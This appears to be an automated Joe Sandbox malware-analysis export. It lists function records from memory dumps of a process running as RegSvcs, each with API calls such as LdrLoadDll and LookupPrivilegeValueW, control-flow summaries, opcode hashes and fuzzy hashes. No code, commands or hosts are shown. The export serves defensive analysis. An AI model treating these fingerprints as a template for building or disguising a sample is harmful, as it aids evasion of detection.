                                                                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 201: 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50; 210: 40835c-40836e PostThreadMessageW; 211: 40838e-408392; 212: 408370-40838a call 40a480; 213: 40838d
                                                                                             • Edges: 201->210, 201->211, 210->212, 210->213, 212->213, 213->211
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                                                            • Instruction ID: 3ad5dae182a485ddbeb7f5a480a9d39f63c17b8903bd479f2bd62391de7c6076
                                                                                            • Opcode Fuzzy Hash: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                                                            • Instruction Fuzzy Hash: C601B531A8032976EB21A6519C42FFF772C9F40F55F04415EFE04BA1C1D6B8690547EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 216: 408310-40831f; 217: 408328-40835a call 41ca00 call 40acf0 call 414e50; 218: 408323 call 41be60; 225: 40835c-40836e PostThreadMessageW; 226: 40838e-408392; 227: 408370-40838a call 40a480; 228: 40838d
                                                                                             • Edges: 216->217, 216->218, 217->225, 217->226, 218->217, 225->227, 225->228, 227->228, 228->226
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 231: 40acf0-40ad19 call 41cc50; 234: 40ad1b-40ad1e; 235: 40ad1f-40ad2d call 41d070; 238: 40ad3d-40ad4e call 41b4a0; 239: 40ad2f-40ad3a call 41d2f0; 244: 40ad50-40ad64 LdrLoadDll; 245: 40ad67-40ad6a
                                                                                             • Edges: 231->234, 231->235, 235->238, 235->239, 238->244, 238->245, 239->238, 244->245
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 258: 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                                                             • Edges: none (single block)
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 261: 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                                                             • Edges: none (single block)
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (basic blocks and edges from the exported graph)
                                                                                             • Blocks: 267: 41a6b0-41a6dc call 41af60 ExitProcess
                                                                                             • Edges: none (single block)
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014E9140,000000FF,00000022,?,00000004,00000000,00000000), ref: 014F2C24
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014B13C2,00000000,7D810F61,00000009,00000018,000000D4,-00000018,7D810F61), ref: 014F2B6A
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014C0857,000000FF,014C055F,00000000,7D810F61,00001000,00000004,00000000,00000000,00000000), ref: 014F2BFA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014EE308,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,00000008,?), ref: 014F2ADA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014D12BC,014D1427,000000FF,?,00000000,00000000,00000000,00000079,00000001,00800000,?,?,01481164,00000001,00000000,0000001D), ref: 014F2D1A
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014E6918,000000FF,?,?,014CD528,015A6664,015A6664,C0000225,00000000,?,014CE5AE,?,?,00000000,?,?), ref: 014F2D3A
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014EE47B,00000000,FFD23940,?,?,00000000), ref: 014F2DDA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014EA618,00000037,?,00000408,00000000,?,00000000,Threadpool!), ref: 014F2DFA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014AFB34,000000FF,00000000,00000000,00000000,-00010000,00000000,00000000,00000000,?,014AF559,00000000,00004000,00000000,00000000,00000000), ref: 014F2C7A
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014D3999,000000FA,00000001,?,00000050,?,?), ref: 014F2CAA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014DE6D9,01000000,0000000D,00000000,00000000,00000010,01000000,?,?,00100021,00000018,?,00000005,00000060,000014A5), ref: 014F2F3A
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014F17E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 014F2FEA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014C03D9,000000FF,?,00001000,00000001,?,?,?,00800001,00000000,-00000001,?,00800001,00002001,?,?), ref: 014F2F9A
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014F05E3,?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?), ref: 014F2FBA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(014E6EBC,?,00000000,00000001,00000010,?,?,?,000000FE,00000028,00000000,?), ref: 014F2EAA
Memory Dump Source
• Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                            • Opcode ID: 60d9d9cc66d90afba6763109dd78303276eeac863d17e2a9f7d2fb6863cbff3e
                                                                                            • Instruction ID: 62bd9d969c855874343e63f5a01766b932a767e9e37a96afd1660431aa9ca531
                                                                                            • Opcode Fuzzy Hash: 60d9d9cc66d90afba6763109dd78303276eeac863d17e2a9f7d2fb6863cbff3e
                                                                                            • Instruction Fuzzy Hash: 2090027160180442D14171984404B460045A7D0311F59C411A5064998EC6998ED56765
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 52221e0653bf8bb605d56922a728becdbebc4a5dadebf833470fb240004c8702
                                                                                            • Instruction ID: fefcd66e304a1b4c5ba07b7cfc612c00415cfdd2527ea9bcc3fc1974a3f87018
                                                                                            • Opcode Fuzzy Hash: 52221e0653bf8bb605d56922a728becdbebc4a5dadebf833470fb240004c8702
                                                                                            • Instruction Fuzzy Hash: BE81AF70E052499EEF258E6CC8917FFBBB2EF86360F18411FDA55A73B1C63498418B52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 014F2DF0: LdrInitializeThunk.NTDLL(014EA618,00000037,?,00000408,00000000,?,00000000,Threadpool!), ref: 014F2DFA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BA3
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BB6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D60
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D74
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1404860816-0
                                                                                            • Opcode ID: 4ba3125a0d1da22ab7f46797cfb87582c56a4675b712e6df81c02f51b9a9c42a
                                                                                            • Instruction ID: 526e53c1229381192c47ae03020dddabe2f9298570616a01fbc314b7454f55c9
                                                                                            • Opcode Fuzzy Hash: 4ba3125a0d1da22ab7f46797cfb87582c56a4675b712e6df81c02f51b9a9c42a
                                                                                            • Instruction Fuzzy Hash: 84F17A76A007159FDB20CF68C880BAAB7F5FF54314F1445AEEA89AB351E770A944CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 9bb2327a3b238e02b00032b8e49fe6c0648036f27ae53b27d8173307ab47651f
                                                                                            • Instruction ID: 5afee909056e5b504eead4e51bd933a585419e806968eb9dc7166c049ac7cd74
                                                                                            • Opcode Fuzzy Hash: 9bb2327a3b238e02b00032b8e49fe6c0648036f27ae53b27d8173307ab47651f
                                                                                            • Instruction Fuzzy Hash: B3919371E002069AEB24DF6DC890ABFBBA5EF44322F54451FEB55A73E0D73899418721
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%